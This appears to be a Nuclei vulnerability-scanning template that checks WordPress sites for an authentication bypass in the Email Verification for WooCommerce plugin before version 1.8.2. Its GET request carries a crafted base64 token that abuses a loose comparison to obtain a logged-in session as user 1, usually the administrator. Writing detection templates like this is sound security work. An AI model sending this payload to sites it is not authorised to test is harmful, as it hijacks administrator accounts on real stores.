id: wp-woocommerce-email-verification info: name: wordpress-emails-verification-for-woocommerce author: random-robbie severity: critical # Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass # https://wpvulndb.com/vulnerabilities/10318 # GDPR plugin may give a false positive so double check headers requests: - method: GET path: - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" matchers-condition: and matchers: - type: word words: - "wordpress_logged_in" part: header